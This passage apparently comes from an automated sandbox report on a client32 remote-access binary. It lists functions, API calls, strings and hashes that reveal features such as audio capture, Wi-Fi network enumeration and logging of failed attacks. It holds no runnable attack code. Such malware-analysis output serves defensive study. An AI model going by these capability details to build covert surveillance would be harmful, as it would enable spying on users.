                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 3341947355-3231647555
                                                                                • Opcode ID: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                                • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                • Opcode Fuzzy Hash: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                                • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _calloc.LIBCMT ref: 1104702F
                                                                                • wsprintfA.USER32 ref: 110470AE
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • wsprintfA.USER32 ref: 110470E9
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                • _strrchr.LIBCMT ref: 1104720C
                                                                                • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                • _free.LIBCMT ref: 11047251
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                • API String ID: 1757445300-1785190265
                                                                                • Opcode ID: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                • Opcode Fuzzy Hash: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • _malloc.LIBCMT ref: 1100B496
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                  • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,1B702977,?,00000000,00000000), ref: 1100AD54
                                                                                  • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                  • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                  • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                  • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                  • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                  • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                  • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,1B702977,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                • _calloc.LIBCMT ref: 1100B519
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                Strings
                                                                                • DisableSounds, xrefs: 1100B472
                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                • Audio, xrefs: 1100B477
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                • API String ID: 1843377891-2362500394
                                                                                • Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                                • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                • Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                                • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                Function 1102B920 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                • _fgets.LIBCMT ref: 1102BB10
                                                                                • _strtok.LIBCMT ref: 1102BB38
                                                                                  • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                                • _fgets.LIBCMT ref: 1102BB74
                                                                                • _strtok.LIBCMT ref: 1102BB88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 78526175-1484737611
                                                                                • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                Function 11027B20 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 174windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BB0
                                                                                • LoadIconA.USER32(00000000,00007D0B), ref: 11027BC5
                                                                                • GetSystemMetrics.USER32(00000032), ref: 11027BDE
                                                                                • GetSystemMetrics.USER32(00000031), ref: 11027BE3
                                                                                • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027BF3
                                                                                • LoadIconA.USER32(11000000,00000491), ref: 11027C0B
                                                                                • GetSystemMetrics.USER32(00000032), ref: 11027C1A
                                                                                • GetSystemMetrics.USER32(00000031), ref: 11027C1F
                                                                                • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027C30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                • String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
                                                                                • API String ID: 1946015-4092316048
                                                                                • Opcode ID: 7b6417ce7b3594b7669bd5d6d24d0fb252bf9abee04dc108a4f179c77e3cc1ac
                                                                                • Instruction ID: b61cf272041b3986789d5db62e37e05cd74fdd835a4c3c17a37838dc7586d827
                                                                                • Opcode Fuzzy Hash: 7b6417ce7b3594b7669bd5d6d24d0fb252bf9abee04dc108a4f179c77e3cc1ac
                                                                                • Instruction Fuzzy Hash: 4D51D8B5F4061A6BE711CBB08D81F6FB6ACAF54758F500469FA05E7680EB70E900C7A2
                                                                                Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                                • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                                • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                                • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                                • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                                • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                                • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                • API String ID: 2439742961-1736626566
                                                                                • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                • _free.LIBCMT ref: 1112131D
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _free.LIBCMT ref: 11121333
                                                                                • _free.LIBCMT ref: 11121348
                                                                                • GdiFlush.GDI32(?,?,?,012F8E30), ref: 11121350
                                                                                • _free.LIBCMT ref: 1112135D
                                                                                • _free.LIBCMT ref: 11121371
                                                                                • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                • DeleteObject.GDI32(?), ref: 1112139A
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,012F8E30), ref: 111213A4
                                                                                • DeleteDC.GDI32(?), ref: 111213CB
                                                                                • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                • DeleteDC.GDI32(?), ref: 111213EB
                                                                                • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                Strings
                                                                                • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                • String ID: Error deleting membm, e=%d
                                                                                • API String ID: 3195047866-709490903
                                                                                • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                Function 110537C0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 360COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,1B702977,?,?), ref: 11041F52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
